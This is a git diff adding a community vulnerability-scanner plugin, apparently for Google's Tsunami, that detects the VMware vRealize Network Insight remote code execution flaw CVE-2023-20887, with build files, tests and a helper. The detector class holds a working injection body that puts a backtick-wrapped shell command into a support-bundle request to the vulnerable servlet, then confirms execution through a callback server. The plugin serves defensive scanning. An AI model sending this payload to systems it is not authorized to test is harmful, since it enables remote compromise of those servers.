diff --git a/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/README.md b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/README.md new file mode 100644 index 000000000..e2d2d172f --- /dev/null +++ b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/README.md @@ -0,0 +1,16 @@ +# VMware vRealize Network Insight RCE CVE-2023-20887 Detector + +This detector checks for VMware vRealize Network Insight RCE (CVE-2023-20887). + +- https://www.vmware.com/security/advisories/VMSA-2023-0012.html +- https://kb.vmware.com/s/article/92684 + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. \ No newline at end of file diff --git a/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/build.gradle b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/build.gradle new file mode 100644 index 000000000..15f9d173f --- /dev/null +++ b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/build.gradle @@ -0,0 +1,67 @@ +plugins { + id 'java-library' +} + +description = 'VMware vRealize Network Insight RCE CVE-2023-20887 VulnDetector plugin.' +group = 'com.google.tsunami' +version = '0.0.1-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/en/java/javase/11/' + source = '11' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = '0.0.14' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + okhttpVersion = '3.12.0' + truthVersion = '1.1.3' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" +} diff --git a/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/gradle/wrapper/gradle-wrapper.jar b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..62d4c0535 Binary files /dev/null and b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/gradle/wrapper/gradle-wrapper.properties b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..99c200fc2 --- /dev/null +++ b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,5 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/gradlew b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/gradlew new file mode 100755 index 000000000..fbd7c5158 --- /dev/null +++ b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/gradlew @@ -0,0 +1,185 @@ +#!/usr/bin/env sh + +# +# Copyright 2015 the original author or authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +## +## Gradle start up script for UN*X +## +############################################################################## + +# Attempt to set APP_HOME +# Resolve links: $0 may be a link +PRG="$0" +# Need this for relative symlinks. +while [ -h "$PRG" ] ; do + ls=`ls -ld "$PRG"` + link=`expr "$ls" : '.*-> \(.*\)$'` + if expr "$link" : '/.*' > /dev/null; then + PRG="$link" + else + PRG=`dirname "$PRG"`"/$link" + fi +done +SAVED="`pwd`" +cd "`dirname \"$PRG\"`/" >/dev/null +APP_HOME="`pwd -P`" +cd "$SAVED" >/dev/null + +APP_NAME="Gradle" +APP_BASE_NAME=`basename "$0"` + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD="maximum" + +warn () { + echo "$*" +} + +die () { + echo + echo "$*" + echo + exit 1 +} + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "`uname`" in + CYGWIN* ) + cygwin=true + ;; + Darwin* ) + darwin=true + ;; + MINGW* ) + msys=true + ;; + NONSTOP* ) + nonstop=true + ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD="$JAVA_HOME/jre/sh/java" + else + JAVACMD="$JAVA_HOME/bin/java" + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD="java" + which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." +fi + +# Increase the maximum file descriptors if we can. +if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then + MAX_FD_LIMIT=`ulimit -H -n` + if [ $? -eq 0 ] ; then + if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then + MAX_FD="$MAX_FD_LIMIT" + fi + ulimit -n $MAX_FD + if [ $? -ne 0 ] ; then + warn "Could not set maximum file descriptor limit: $MAX_FD" + fi + else + warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" + fi +fi + +# For Darwin, add options to specify how the application appears in the dock +if $darwin; then + GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" +fi + +# For Cygwin or MSYS, switch paths to Windows format before running java +if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then + APP_HOME=`cygpath --path --mixed "$APP_HOME"` + CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` + + JAVACMD=`cygpath --unix "$JAVACMD"` + + # We build the pattern for arguments to be converted via cygpath + ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` + SEP="" + for dir in $ROOTDIRSRAW ; do + ROOTDIRS="$ROOTDIRS$SEP$dir" + SEP="|" + done + OURCYGPATTERN="(^($ROOTDIRS))" + # Add a user-defined pattern to the cygpath arguments + if [ "$GRADLE_CYGPATTERN" != "" ] ; then + OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" + fi + # Now convert the arguments - kludge to limit ourselves to /bin/sh + i=0 + for arg in "$@" ; do + CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` + CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option + + if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition + eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` + else + eval `echo args$i`="\"$arg\"" + fi + i=`expr $i + 1` + done + case $i in + 0) set -- ;; + 1) set -- "$args0" ;; + 2) set -- "$args0" "$args1" ;; + 3) set -- "$args0" "$args1" "$args2" ;; + 4) set -- "$args0" "$args1" "$args2" "$args3" ;; + 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; + 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; + 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; + 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; + 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; + esac +fi + +# Escape application args +save () { + for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done + echo " " +} +APP_ARGS=`save "$@"` + +# Collect all arguments for the java command, following the shell quoting and substitution rules +eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" + +exec "$JAVACMD" "$@" diff --git a/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/gradlew.bat b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/gradlew.bat new file mode 100644 index 000000000..5093609d5 --- /dev/null +++ b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/gradlew.bat @@ -0,0 +1,104 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%" == "" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%" == "" set DIRNAME=. +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if "%ERRORLEVEL%" == "0" goto init + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto init + +echo. +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:init +@rem Get command-line arguments, handling Windows variants + +if not "%OS%" == "Windows_NT" goto win9xME_args + +:win9xME_args +@rem Slurp the command line arguments. +set CMD_LINE_ARGS= +set _SKIP=2 + +:win9xME_args_slurp +if "x%~1" == "x" goto execute + +set CMD_LINE_ARGS=%* + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% + +:end +@rem End local scope for the variables with windows NT shell +if "%ERRORLEVEL%"=="0" goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 +exit /b 1 + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/settings.gradle b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/settings.gradle new file mode 100644 index 000000000..e97f95098 --- /dev/null +++ b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'vmware_vrealize_network_insight_cve_2023_20887' diff --git a/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202320887/Cve202320887Detector.java b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202320887/Cve202320887Detector.java new file mode 100644 index 000000000..a083adc49 --- /dev/null +++ b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202320887/Cve202320887Detector.java @@ -0,0 +1,166 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202320887; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.common.net.HttpHeaders.CONTENT_TYPE; +import static com.google.tsunami.common.data.NetworkServiceUtils.buildWebApplicationRootUrl; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Instant; +import javax.inject.Inject; + +/** A {@link VulnDetector} that detects VMware vRealize Network Insight RCE CVE-2023-20887. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "VMware vRealize Network Insight RCE CVE-2023-20887 Detector", + version = "0.1", + description = "This detector checks VMware vRealize Network Insight RCE (CVE-2023-20887)", + author = "secureness", + bootstrapModule = Cve202320887DetectorBootstrapModule.class) +public final class Cve202320887Detector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + @VisibleForTesting static final String VULNERABLE_REQUEST_PATH = "saas./resttosaasservlet"; + private static final String HTTP_BODY = + "[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`%s`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]"; + + private final Clock utcClock; + private final HttpClient httpClient; + + private final PayloadGenerator payloadGenerator; + + @Inject + Cve202320887Detector( + @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) { + + this.utcClock = checkNotNull(utcClock); + this.httpClient = checkNotNull(httpClient).modify().setTrustAllCertificates(true).build(); + this.payloadGenerator = checkNotNull(payloadGenerator); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + logger.atInfo().log("Cve202320887Detector starts detecting."); + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + if(payloadGenerator.isCallbackServerEnabled()){ + try { + return isVulnerableWithCallback(networkService); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + } + return false; + } + + private boolean isVulnerableWithCallback(NetworkService networkService) throws InterruptedException { + PayloadGeneratorConfig config = + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build(); + + Payload payload = payloadGenerator.generate(config); + String cmd = payload.getPayload(); + + sendRequest(networkService, String.format(HTTP_BODY, cmd)); + Thread.sleep(10000); + return payload.checkIfExecuted(); + } + + private void sendRequest(NetworkService networkService, String Payload) { + HttpHeaders httpHeaders = + HttpHeaders.builder().addHeader(CONTENT_TYPE, "application/x-thrift").build(); + + String targetVulnerabilityUrl = buildTarget(networkService) + VULNERABLE_REQUEST_PATH; + try { + httpClient.send( + post(targetVulnerabilityUrl) + .setHeaders(httpHeaders) + .setRequestBody(ByteString.copyFromUtf8(Payload)) + .build(), + networkService); + } catch (IOException | AssertionError e) { + logger.atWarning().withCause(e).log("Request to target %s failed", networkService); + } + } + + private static String buildTarget(NetworkService networkService) { + return buildWebApplicationRootUrl(networkService); + } + + @VisibleForTesting + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE-2023-20887")) + .setSeverity(Severity.CRITICAL) + .setTitle("VMware vRealize Network Insight RCE (CVE-2023-20887)") + .setDescription( + "VMware vRealize Network Insight Versions 6.x Running On any kind of devices are subject to a remote code execution vulnerability." + + " Please refer to https://kb.vmware.com/s/article/92684 to fix this critical vulnerability")) + .build(); + } +} diff --git a/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202320887/Cve202320887DetectorBootstrapModule.java b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202320887/Cve202320887DetectorBootstrapModule.java new file mode 100644 index 000000000..ed631012d --- /dev/null +++ b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202320887/Cve202320887DetectorBootstrapModule.java @@ -0,0 +1,27 @@ +/* + * Copyright 2022 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202320887; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +/** A {@link PluginBootstrapModule} for {@link Cve202320887Detector}. */ +public final class Cve202320887DetectorBootstrapModule extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + registerPlugin(Cve202320887Detector.class); + } +} diff --git a/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202320887/Cve202320887DetectorWithCallbackServerTest.java b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202320887/Cve202320887DetectorWithCallbackServerTest.java new file mode 100644 index 000000000..de4b072de --- /dev/null +++ b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202320887/Cve202320887DetectorWithCallbackServerTest.java @@ -0,0 +1,111 @@ +/* + * Copyright 2022 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202320887; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.protobuf.util.JsonFormat; +import com.google.tsunami.callbackserver.proto.PollingResult; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.TargetInfo; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for {@link Cve202320887Detector}. */ +@RunWith(JUnit4.class) +public final class Cve202320887DetectorWithCallbackServerTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2024-01-29T00:00:00.00Z")); + + private MockWebServer mockWebServer; + private MockWebServer mockCallbackServer; + private NetworkService service; + private TargetInfo targetInfo; + + @Inject private Cve202320887Detector detector; + + @Before + public void setUp() throws IOException { + mockWebServer = new MockWebServer(); + mockCallbackServer = new MockWebServer(); + mockCallbackServer.start(); + + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().setCallbackServer(mockCallbackServer).build(), + new Cve202320887DetectorBootstrapModule()) + .injectMembers(this); + + service = TestHelper.createWebService(mockWebServer); + + targetInfo = TestHelper.buildTargetInfo(forHostname(mockWebServer.getHostName())); + } + + @After + public void tearDown() throws IOException { + mockWebServer.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability() throws IOException { + mockWebServer.enqueue( + new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody("Some Constant Body")); + PollingResult log = PollingResult.newBuilder().setHasHttpInteraction(true).build(); + String body = JsonFormat.printer().preservingProtoFieldNames().print(log); + mockCallbackServer.enqueue( + new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody(body)); + + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly(TestHelper.buildValidDetectionReport(targetInfo, service, fakeUtcClock)); + assertThat(mockWebServer.getRequestCount()).isEqualTo(1); + assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + } + + @Test + public void detect_ifNotVulnerable_doesNotReportVuln() throws IOException { + mockWebServer.enqueue( + new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody("Some Constant Body")); + mockWebServer.enqueue(new MockResponse().setResponseCode(HttpStatus.NOT_FOUND.code())); + + PollingResult log = PollingResult.newBuilder().setHasHttpInteraction(true).build(); + String body = JsonFormat.printer().preservingProtoFieldNames().print(log); + mockCallbackServer.enqueue( + new MockResponse().setResponseCode(HttpStatus.NOT_FOUND.code()).setBody(body)); + + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } +} diff --git a/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202320887/TestHelper.java b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202320887/TestHelper.java new file mode 100644 index 000000000..2ec46e13b --- /dev/null +++ b/community/detectors/vmware_vrealize_network_insight_cve_2023_20887/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202320887/TestHelper.java @@ -0,0 +1,71 @@ +/* + * Copyright 2022 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.cves.cve202320887; + +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkEndpoint; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TransportProtocol; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.time.Instant; +import okhttp3.mockwebserver.MockWebServer; + +final class TestHelper { + private TestHelper() {} + + static NetworkService createWebService(MockWebServer mockWebServer) { + return NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build(); + } + + static TargetInfo buildTargetInfo(NetworkEndpoint networkEndpoint) { + return TargetInfo.newBuilder().addNetworkEndpoints(networkEndpoint).build(); + } + + static DetectionReport buildValidDetectionReport( + TargetInfo targetInfo, NetworkService service, FakeUtcClock fakeUtcClock) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE-2023-20887")) + .setSeverity(Severity.CRITICAL) + .setTitle("VMware vRealize Network Insight RCE (CVE-2023-20887)") + .setDescription( + "VMware vRealize Network Insight Versions 6.x Running On any kind of devices are subject to a remote code execution vulnerability." + + " Please refer to https://kb.vmware.com/s/article/92684 to fix this critical vulnerability")) + .build(); + } +}